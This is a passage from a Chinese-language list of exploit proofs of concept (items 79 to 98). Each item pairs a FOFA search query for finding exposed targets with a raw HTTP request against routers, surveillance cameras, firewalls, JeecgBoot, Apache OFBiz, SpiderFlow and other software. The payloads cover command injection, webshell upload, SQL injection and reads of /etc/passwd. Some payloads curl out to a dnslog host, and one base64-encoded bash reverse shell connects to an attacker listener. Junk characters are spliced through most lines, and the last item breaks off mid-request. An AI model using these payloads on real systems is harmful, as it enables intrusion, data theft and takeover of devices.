------YsOxWxSvj1KyZow1PTsh98fdu6l--8 ]" l6 [: a1 @1 d3 Q3 x
& { O- X& v- _8 P
' U) D0 U( Z6 p! T% D4 S3 o/ ]+ ^8 o% ?9 rGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
' Q( Q3 ^ V# q0 o0 B. G8 hHost: x.x.x.x# k2 c$ D9 E3 n! ~: C7 `" T+ u
8 ~5 _9 h8 l$ B' s1 E
0 B. H7 _7 j2 p% ]79. BYTEVALUE 百为流控路由器远程命令执行
" m3 a! h& N2 P/ ]FOFA:BYTEVALUE 智能流控路由器* J( i9 n0 q3 K; B7 b2 M
GET /goform/webRead/open/?path=|id HTTP/1.1" K0 y5 l* q: S# O$ J
Host:IP! e) c+ m+ a6 j/ ~- t D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.01 L. q! x8 g$ _; A0 k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& T+ C2 N# i- b, R4 n; MAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! E- p2 M! P8 c! y6 n1 QAccept-Encoding: gzip, deflate0 C. K/ D: {/ g% H. \
Connection: close. @3 ^" b4 {; R
Upgrade-Insecure-Requests: 1
& v3 m7 q; w# O! ?/ A
Y& {* B7 e7 ~; X3 r" k) V" ]( \' _1 @# ]$ `
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传; W; H% l- N$ X4 B! g
FOFA:app="速达软件-公司产品"2 r7 r6 {$ _8 d) E
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
2 q+ r5 ^; I& }) DHost: x.x.x.x3 R9 v0 S4 {1 w: B# E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) x' B$ D! G- B# FContent-Length: 27
5 K w3 \, \2 R% ]# V, T TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" u$ J `( w; ^6 T# G f% [( @
Accept-Encoding: gzip, deflate
4 U4 O* w4 T0 `+ \) w8 m" `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- ^! b$ _9 w9 |5 HConnection: close
; {0 ~+ K5 [$ B0 _5 ]* Q9 c. YContent-Type: application/octet-stream
2 h' G# l7 S/ x5 r) x* S' CUpgrade-Insecure-Requests: 19 w) `' `( C) _. G6 W1 [: @0 V9 o
, b: H( E2 I( n1 j5 y" X/ S; J
<% out.print("oessqeonylzaf");%>; M. x2 ]: d7 Y8 M; b7 @
& p; ^* t' m- G2 j/ @! m4 N
8 k6 U- h N) y: z
GET /xykqmfxpoas.jsp HTTP/1.1
3 E- e8 W$ X# F1 dHost: x.x.x.x
Z/ ~3 B" r% b2 D `User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 K4 C8 h% a! z9 T7 P* ?1 G. g
Connection: close! a- B0 _" q' J8 ]5 w4 H6 D3 H
Accept-Encoding: gzip+ V1 Y8 x+ j( |2 z/ M2 u
4 }) P5 ?( `) m( c# N2 F& B% T
( B" s3 y, f2 V# j5 u; a/ R8 `8 k81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
3 u' R- ]2 ]9 n% c! ?FOFA:app="uniview-视频监控"' V. N0 G& h/ c/ J2 V
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
x, K! @7 r" n x, k E$ JHost: x.x.x.x) ?9 g; u" i: Y! C- {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 U4 j! }! e+ l/ fConnection: close
1 t( h' b/ {5 y# @* O, BAccept-Encoding: gzip
/ ?2 v! l9 h" A% \
. l. J0 d2 O% W- ^
( @8 ^" |* D, r* U3 E; M& z' V82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行/ i) A' N1 S5 Q" Q H3 r9 }
FOFA:app="思福迪-LOGBASE"
7 \* J$ A2 q, w) j/ w( s0 aPOST /bhost/test_qrcode_b HTTP/1.1/ B' D+ X. L2 `. g5 C
Host: BaseURL7 N, L" H/ k: C& P) t: g( ]
User-Agent: Go-http-client/1.1, U# N% h0 k e0 d, ?' F+ q
Content-Length: 23
4 m, @5 _2 n5 R' A3 AAccept-Encoding: gzip6 W" t8 ?+ ?' S% a/ U3 n
Connection: close7 [. S- Z# c# H" L- X( X6 Q. f' w
Content-Type: application/x-www-form-urlencoded
. }) g. t/ U: nReferer: BaseURL
7 p5 Z6 L# y1 t( W0 r8 e7 A9 b+ |) a8 W
z1=1&z2="|id;"&z3=bhost0 e; M3 P9 m! S+ _) T& q
' G/ N3 U# X- i5 y: d2 j" o% s, b3 K0 o9 ?* l% m, W& o/ g
83. JeecgBoot testConnection 远程命令执行
& `6 t# k% S2 c# b4 k$ OFOFA:title=="JeecgBoot 企业级低代码平台" e; \8 k4 J& w2 `( y) \
6 E, n, m8 S' p3 k2 ]" w# k
# @+ [( s( e) V3 ]7 o( YPOST /jmreport/testConnection HTTP/1.1; f3 k, U( W# o
Host: x.x.x.x
9 E k( Q+ {: i; V# E2 y$ WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: e4 H, P' ]$ R0 s6 g7 e7 q0 f6 QConnection: close& B7 ], Y9 R, N7 [7 U, n( _$ _7 a/ {
Content-Length: 88812 H$ H5 z) a- T
Accept-Encoding: gzip
2 y6 I" }6 E/ x9 ?1 pCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
G% Y; }" C8 X V+ n# kContent-Type: application/json, o6 Z$ k9 P9 R" ]0 v
) }& f6 F, ?% j/ X5 lPAYLOAD$ y2 d& o6 D4 @
$ I6 V3 n( G5 U9 z% o6 b/ G84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
. W! d* g: d8 _: Q' F* UFOFA:title=="JeecgBoot 企业级低代码平台"
% }0 [6 ? }6 N# Y2 d/ o" W
# \- H: ^. n* e/ t$ o0 {2 n5 P+ v' r- H
- t" F) m7 Z6 N, o; U# d, E1 W
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1* x' n: S' x) A- ?: j! }1 _# `
Host: 192.168.40.130:80805 a. ]! F% f( u: q7 J) @9 Q
User-Agent: curl/7.88.14 L" g& q4 w9 l. C" |
Content-Length: 156/ p( H4 w, O7 _" ^, L& ~
Accept: */*: b# M0 D! U9 h" M) r/ z5 L* A
Connection: close+ r* a& S! k* P8 N: r2 Z7 E# Y
Content-Type: application/json4 j4 g% H6 g( H3 z# G
Accept-Encoding: gzip
; C5 H/ `" r6 c* x1 G! w; w0 |3 @/ o2 W
{
7 G( R* c& o3 L0 `7 I "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
9 X7 Y+ [% L P "type": "0"
+ h2 [6 N# s. Z}
( l5 N/ y5 M- x$ L4 u
0 S) D9 h/ D# N1 @5 A" I5 K9 |+ z9 O+ o( y- P9 e
85. SysAid On-premise< 23.3.36远程代码执行& \3 X" N* t; M' a
CVE-2023-47246
y r o+ `# @8 t( |FOFA:body="sysaid-logo-dark-green.png" / z/ ]" z9 B: _ O+ f9 z
EXP数据包如下,注入哥斯拉马% L* R4 R6 i0 R# c! {+ c3 @
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
- E7 b7 [* o/ ~3 _: I4 P* z; Z7 UHost: x.x.x.x
% W) o/ R4 C. }. |* gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( U" b/ k. L8 s* H5 l/ K
Content-Type: application/octet-stream
/ @$ H& p' m8 G' sAccept-Encoding: gzip- R) Y& [; ]8 I% G* k
% \& U/ V+ j& B# K# W3 m
PAYLOAD' J& |$ A+ R2 K+ D
$ U e( T3 c' N# f/ b1 s; u$ v回显URL:http://x.x.x.x/userfiles/index.jsp+ D* a ^: I7 R0 }% p
w( p% j$ I( R# N" p3 _86. 日本tosei自助洗衣机RCE& G8 g9 U* S8 J) Q, R) T4 m) t9 |
FOFA:body="tosei_login_check.php"
2 c- ?- ?! K$ PPOST /cgi-bin/network_test.php HTTP/1.1
2 B; ? a4 j! y7 _" ?3 z* h0 PHost: x.x.x.x& V4 n7 t6 E8 k2 [
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.366 x7 Q: E2 |7 w( {, s5 m& a
Connection: close+ L+ T- k4 s* P) r& i T6 A m/ J
Content-Length: 44- Q1 A% @: n8 H1 v3 i5 v
Accept: */*8 t8 ?; L0 E* _ o" w# T
Accept-Encoding: gzip1 W7 T t- D1 F/ U
Accept-Language: en
8 E! n; z l" v$ |3 Y0 _* l3 y$ fContent-Type: application/x-www-form-urlencoded
; T5 h& W- R6 ~, }0 Z5 N" Q7 q1 z' {4 r/ O: V
host=%0acat${IFS}/etc/passwd%0a&command=ping* [9 \8 x; O3 G3 V( G- ?
9 m4 |- u5 F6 o6 q* U7 { h+ _: e( } V o6 D- B0 I
87. 安恒明御安全网关aaa_local_web_preview文件上传6 u. M3 q* s4 [
FOFA:title="明御安全网关"8 n6 p' C6 N l% |
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
5 U* Z; F( m( f1 V( F3 q i7 |Host: X.X.X.X. ` S% L, o% v; y# I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' M7 i; U X+ FConnection: close" F/ r2 `# _5 ^) A& T5 C6 M5 s5 R* S. R
Content-Length: 198/ E1 J2 h% `0 q! ~& z
Accept-Encoding: gzip
, \9 `+ _2 U( PContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd c# a2 m% q5 C1 H$ {$ k4 \4 O, m
$ U. ~5 _1 c$ J8 s& l
--qqobiandqgawlxodfiisporjwravxtvd
# U4 |" w4 o q8 a3 }& eContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"! `& u9 w; q0 s- a" }: T: _ R
Content-Type: text/plain/ F8 k5 U& X/ N) t$ U
8 s1 \: S, ?% Y+ ?3 u+ }
2ZqGNnsjzzU2GBBPyd8AIA7QlDq( r2 z f) R$ O5 v4 v, ]9 p6 `
--qqobiandqgawlxodfiisporjwravxtvd--
/ q& F9 s) U$ x( ^) Q& u$ h2 L3 ]5 X( J
- M- Z! x) l. l$ l$ J7 R
/jfhatuwe.php
5 Q! B" z3 [/ v) ?) A0 c5 r! U2 A( `$ j ]/ d, V( p
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行* m! e! J/ |9 q. q
FOFA:title="明御安全网关"
0 y% O, z9 K4 w0 ] {GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1# [2 G) U* `2 C2 I' [
Host: x.x.x.xx.x.x.x# w! C% y/ u% {+ C* z# C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! G7 P) V" B$ M* [8 c( @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 y$ j" O( C; a/ M
Accept-Encoding: gzip, deflate
V3 }1 _ a2 dAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ k# I/ ^" r$ z) ~Connection: close
7 u% f' T* j' q) Q. P% X" b" F5 J8 P4 W0 v- Q1 R
$ y, [1 u+ s: u% R x/astdfkhl.php
+ j) v. X! V, ~) x0 _' F) u5 g! i2 g- e* |- @9 [
89. 致远互联FE协作办公平台editflow_manager存在sql注入3 B- \+ l* J m# t. ~- `9 H! V/ h, ]
FOFA:title="FE协作办公平台" || body="li_plugins_download"
5 O3 i5 ~1 Z1 I+ y& lPOST /sysform/003/editflow_manager.js%70 HTTP/1.1- U) t' f: k* E$ B5 D9 m2 M* R( ?; I
Host: x.x.x.x
; Z' ?# U) e1 xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 h7 r4 Q9 b3 j T
Connection: close
2 ?8 o# i% \- q# c( D3 @ V7 O& f; h2 cContent-Length: 41' F& l% b' n& ?! }
Content-Type: application/x-www-form-urlencoded7 |6 ~4 X( a" J z
Accept-Encoding: gzip$ T) L* I- y' J: G" h8 H$ E, a! f
# Z; _ B& @$ v5 p1 `! O) Poption=2&GUID=-1'+union+select+111*222--+" |, I+ K7 D& a9 J* W
2 O+ J( D1 ]$ A% N
' y0 B- t8 }9 d& k- y2 w U90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行, i, i1 c* i5 h4 n5 K& \# |" l
FOFA:icon_hash="-1830859634"
; S J; P4 \( |- WPOST /php/ping.php HTTP/1.1
) V9 A' J7 C" u% ? y$ XHost: x.x.x.x. @% U$ r$ n: T5 y& a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
9 ]0 u- v! P# ~4 wContent-Length: 51% x6 D4 n2 _. r; v! Y
Accept: application/json, text/javascript, */*; q=0.01
, X$ I; S$ W+ ]6 H8 TAccept-Encoding: gzip, deflate+ }- [4 z/ [! o9 {! q+ v! W8 o# a
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; |% v- M9 l8 e! V, S# g
Connection: close( F- n2 N. K$ W7 c. i' w1 G
Content-Type: application/x-www-form-urlencoded
5 t, `- ~$ R) ^& GX-Requested-With: XMLHttpRequest, A: Y( B) |/ [5 M! _8 o* \
& Z" t/ `3 ?/ b0 z0 y9 g: e9 Jjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
6 _$ a! j+ ]- \$ L" u; m8 d% w% ^% z# z4 x: p5 o$ [
v c; I2 d- M% C2 y91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取; b- ?9 A5 e. h1 H" q
FOFA:title="综合安防管理平台"
$ s' y3 @- W3 {7 B; wGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1. f; t' O# k9 h# W- h3 O8 g
Host: your-ip
' f" F7 S4 i( X( X% `- Y, R |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
3 n& z! y1 I: D& ~+ LAccept-Encoding: gzip, deflate
; Z$ M: e5 b/ X: Y! T/ BAccept: */*6 t+ Y' m- b8 J. E1 R6 [+ O
Connection: keep-alive
" ~1 ^7 x! ]( a2 ]
" X7 k a6 L9 ~; \0 \9 F9 t3 f
( U3 y8 W) @. z9 ] n
2 u- o) F8 s% i+ X' ]( _; r" I( A92. 海康威视运行管理中心session命令执行
' V4 M' Y5 x* }: }7 NFastjson命令执行7 t7 [. w- c7 n. w) I. y" G
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
8 [) {; g" J+ z* ~0 APOST /center/api/session HTTP/1.1
7 T2 l8 \2 x0 Z/ ?Host:
$ R; _- E( j" x( x9 u" k$ D0 M1 tAccept: application/json, text/plain, */*
! q8 r: f% U( V# Z* n* bAccept-Encoding: gzip, deflate" Z/ B0 @& i) ^
X-Requested-With: XMLHttpRequest# l& G2 ? ~; I3 o |* u* ]
Content-Type: application/json;charset=UTF-87 B5 r, u( _& F/ Q8 h
X-Language-Type: zh_CN" N3 U- W( x1 G
Testcmd: echo test
& i6 }" h9 v3 {8 l6 k4 t* {5 M5 VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36& {' }& f- z! s$ l" K; s0 r4 I
Accept-Language: zh-CN,zh;q=0.9, E4 y! X- }0 [9 Y8 X- J+ \2 T( U
Content-Length: 57788 D y) b/ I/ }' H- y
" U/ G! u# C+ M" g7 WPAYLOAD
2 P% ]7 r2 Y1 o. A5 V3 H$ j+ J# W$ B9 J# x( [
) M7 j: p U% B
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
$ Z: J1 U6 ]7 G7 R! m0 l# MFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
# D# e/ d1 b3 P9 ?1 |9 N; PPOST /?g=app_av_import_save HTTP/1.1( u, v. j/ L8 M- C* l. ~ R' j
Host: x.x.x.x
' O1 m% i) q# x( NContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx6 }9 Y# v1 m O7 H! C& L" O W
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36* X% P$ [/ X6 u9 w2 B p
4 X9 C. \* E. V5 B* J+ X
------WebKitFormBoundarykcbkgdfx
$ a) m1 ?/ D' n" V, jContent-Disposition: form-data; name="MAX_FILE_SIZE"
B0 ~% V, Q2 f3 |$ }0 p" X, o" w5 e7 F, K; @
10000000( P, _" N/ [6 \* e2 {; u
------WebKitFormBoundarykcbkgdfx
, Q3 ]+ a8 X' h* zContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"5 J+ A* d% E5 b1 D# w
Content-Type: text/plain
7 d# ~/ F) q/ W$ h; c l; P; r0 T$ }% \& Q x; }6 Y
wagletqrkwrddkthtulxsqrphulnknxa
/ Y8 B/ G) b/ _8 [1 z; O------WebKitFormBoundarykcbkgdfx9 Y" b8 {. b2 N9 t+ r) G0 ^4 B
Content-Disposition: form-data; name="submit_post"
! d! Q6 E* w6 ]/ Q$ }. _
; n2 w& }6 n0 _$ W# cobj_app_upfile
0 w4 }: J0 H0 K$ |4 F------WebKitFormBoundarykcbkgdfx! Y: {9 B5 _$ p
Content-Disposition: form-data; name="__hash__"+ h5 \# v- I: V
2 e, x- L9 R$ ?* U9 s7 l) d0b9d6b1ab7479ab69d9f71b05e0e9445
! u$ |9 l% `' F------WebKitFormBoundarykcbkgdfx--
" x& l0 p% t! x7 |1 }* _+ z
Y! s( Z! o3 J W/ }! y* J' M: \' |' j0 x5 P, L
GET /attachements/xlskxknxa.txt HTTP/1.1
Y) q8 W3 A9 ^: HHost: xx.xx.xx.xx
! z; i' I) Z/ F. R8 ]7 `7 oUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36& k1 Q" n7 M/ W" j7 \
; \2 i" Z! U/ B X) }: D! l
# {3 k6 c% O# F, T! ]94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传% d: T, y) V3 @/ p- D: u* U) w7 x( C1 w
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="' l4 W, w( G- h6 c y, Q. T% |! n
POST /?g=obj_area_import_save HTTP/1.12 j E2 U- z! N s5 O& j
Host: x.x.x.x9 g9 K i6 x/ ^; B" y
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt. k0 Z2 k( r% y; a: F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
" w/ [& p$ ^8 ?1 A6 z4 h
$ o6 T) k( y/ H7 S3 v! S) w5 N7 H1 V------WebKitFormBoundarybqvzqvmt
% u' q7 `$ C" y) e$ B8 {3 J' P" B( Q+ QContent-Disposition: form-data; name="MAX_FILE_SIZE"
+ V g. z2 Z3 [, j4 D b
1 A0 Z3 y. t F100000001 [! c, [3 s) v$ o0 K
------WebKitFormBoundarybqvzqvmt
* t6 |3 f8 h" K- F" FContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
6 F T. T, ]' V7 kContent-Type: text/plain3 e- Y$ q9 \+ a) @+ [
1 R- h r* m9 z( P B @pxplitttsrjnyoafavcajwkvhxindhmu
% v6 |$ C. X% p4 h2 v" T------WebKitFormBoundarybqvzqvmt* o6 F6 E/ n& A! k3 P/ q1 A
Content-Disposition: form-data; name="submit_post"
+ A4 r: Q- y1 n! \: I' D
$ r' K2 |+ ]" e, pobj_app_upfile& x9 c- y: t" d+ J
------WebKitFormBoundarybqvzqvmt
$ p& u6 n8 P3 a/ {/ h' ^; |Content-Disposition: form-data; name="__hash__"; R% g; T$ i: f8 |, |
- a8 g) ]- C$ r! D: w6 r) Z
0b9d6b1ab7479ab69d9f71b05e0e94459 U6 B( \+ W0 }! a; ^& P6 A$ y
------WebKitFormBoundarybqvzqvmt--
4 J0 t( ]& W) f0 y" C% n# ^
9 _) ?1 d& y* M. L# M4 {; ?5 J9 |8 V+ @
& W& |! ~9 R! D# V# W9 \
0 O: W \2 D0 v3 ?# f1 EGET /attachements/xlskxknxa.txt HTTP/1.1- l2 `6 i, X) `! I
Host: xx.xx.xx.xx
2 {! m( U/ T# X7 {User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
- }' x N+ T0 u' P9 P3 J* J( j7 U- @, o; ~
% n7 g3 H8 R! B2 U7 o/ P$ O, r$ I
2 e* v8 @9 u& t9 a# W, b8 O: a95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
! U5 n- H. f( D0 ], PCVE-2023-490704 Q: S3 a( V3 x
FOFA:app="Apache_OFBiz"5 O; h2 Z: w: u3 s3 _2 D; \
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
% q6 g0 T1 X! m7 {Host: x.x.x.x
) |( M, I" R! C" V* j5 a' w; d+ GUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36( X$ {7 E% c1 K& `2 {
Connection: close' {4 d+ F7 v- y M' r
Content-Length: 889
4 M$ Q* h# S0 D7 Y; n4 xContent-Type: application/xml! j+ ~4 F, b% |8 D1 P; F& W
Accept-Encoding: gzip
, }/ Y' ]! A) y$ J7 a0 Q- H* h. Z( U3 [! B1 r
<?xml version="1.0"?>
5 k) C2 ^) z( L& U' Q9 P<methodCall>
! y* t: P1 S9 ]" E- W/ ? <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
1 w2 h, G! v7 K$ ?0 P" ^ <params># _( \( v1 m8 }& h, D
<param>
. _6 C! {* Y/ Q0 ~& |( Q; x: [8 e <value>4 m0 R5 [% V: C# n! y! M. `0 [5 |5 ^. ]
<struct>$ R3 [" E2 a) ]& O
<member>
! u( L7 a% Y s' D1 B <name>test</name>
1 h$ G/ E! G" ] <value>7 o8 O2 d$ l7 m5 {/ K$ @5 e
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>* V3 w% c" Y+ Y
</value>7 B3 u% s5 P9 _- E z
</member>
' o* w [0 @) [, p5 f </struct>
4 e" j( K& S0 R! G </value>% ~! M$ r4 z8 O" x0 e
</param>
) V8 z/ o( x0 z) T: {5 b) H5 e. G# y </params>, A7 E+ Z/ { A) m3 F* [
</methodCall>
, G8 \: ^3 H/ [: }6 t4 Z' M3 ?+ |
/ P6 C1 l9 X# B' R6 M) _
- p7 m$ o- c B3 [8 v6 F用ysoserial生成payload
1 Y5 ~+ s5 W9 T' ?3 |java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
3 O1 b A+ h; B5 |1 U" _0 n9 v* ]# [1 N& N
6 U, H( W# M3 Z5 Z* t3 o
将生成的payload替换到上面的POC
2 Q1 Q2 i& `1 i' c' j3 [POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
3 m, \$ s9 ]* Q- D$ b$ y0 iHost: 192.168.40.130:8443* Q" _$ q2 N/ S& c8 u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
0 f+ V2 t/ L8 }Connection: close; Y" F% V" Z/ I9 ^( M1 O4 E' J5 M
Content-Length: 889, u5 ~( ?4 @+ s8 |( T# x5 l
Content-Type: application/xml
P, y/ Q3 x# p+ [/ P7 sAccept-Encoding: gzip# e" V6 i8 w1 ]
& v1 g) @( R# ~
PAYLOAD% A3 q- c/ i$ k% M8 F+ N4 s$ t' m+ J
% h& ?; N2 Q+ i* _% N4 u4 a
96. Apache OFBiz 18.12.11 groovy 远程代码执行
# I9 {! K1 a) m6 y' O* V; t# a4 @FOFA:app="Apache_OFBiz"! e# u* h7 K9 \- L; M: s9 k
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1* j6 K+ m# H* Y4 V
Host: localhost:84439 b: p$ l# O6 c8 Q* b; H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.02 f- ?$ Z7 f3 P% J. b+ e( R
Accept: */*
( [3 X( X, e8 i, f7 bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 C6 H4 t& F$ Q/ `: h( d, _
Content-Type: application/x-www-form-urlencoded
* w) Q" l ~6 |0 N' R# |Content-Length: 55- v' k/ o' a" ^& |1 N, ]+ U; `
- {. l1 ` g1 r! |" M
groovyProgram=throw+new+Exception('id'.execute().text);
$ K6 B0 A5 V- i8 _" i$ w( @) @0 Y* m9 {# t
+ Q& H; h% m2 @' }* [7 E: d1 V9 l* w
反弹shell- |; Y- x: M7 t- n1 }* f( J9 C
在kali上启动一个监听4 f/ c- a! a, N( l9 a
nc -lvp 7777
2 l" m; v+ o2 s4 k, \& U4 I! `3 M! K
- ^4 w# ~" O! A# R1 m& mPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
' V# s: M. @; J3 a5 pHost: 192.168.40.130:8443
7 c& h* u5 ~+ a; A Z: fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.05 g5 Y( B Z5 v! Y
Accept: */*
3 V/ x6 N Q2 C: k, M0 s# CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 {" A( Y2 Q& j. C) m) wContent-Type: application/x-www-form-urlencoded7 q( s, S$ d, G2 f- k8 G8 h% C
Content-Length: 71
/ @+ f ^ v, h+ b
( ~( P( k/ ]0 ]% W) CgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
' K! E a) G# F% Q9 f9 a M' ?( J
) U/ _/ N. {/ N$ O97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行/ p+ L8 a, t! c, u& d ?+ D# S+ {
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
' ^/ A+ K$ N& o4 {GET /passport/login/ HTTP/1.16 L, u' H# q2 v! C M L5 Z
Host: 192.168.40.130:8085
& f, D3 N& [. m7 }7 f& W* OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- v' s- I8 g- V- S9 X
Accept-Encoding: gzip
2 t+ Q2 r( r: C" s( R/ ?. wConnection: close
! ~* S) c6 l+ n- I% M0 Z$ g. |7 _/ dCookie: rememberMe=PAYLOAD3 D- P3 Y# C* l! k5 [/ ^, x0 c. Q [
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
) k4 q- R7 |0 ^) A
0 d9 w6 ]' T, P D0 H+ y: I x) r* V2 Y8 X
98. SpiderFlow爬虫平台远程命令执行
- }" p) F& R- s8 BCVE-2024-0195" h6 A9 z# X7 K) J* p+ C- Q/ B
FOFA:app="SpiderFlow"2 l4 j# {1 V3 D
POST /function/save HTTP/1.15 s6 U' F% t" r- ]$ l4 R2 O
Host: 192.168.40.130:8088
3 U; h S' T8 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0, y8 m) Y; r) `/ T) L2 j
Connection: close5 K3 @% {; G5 j) m8 C4 x8 S
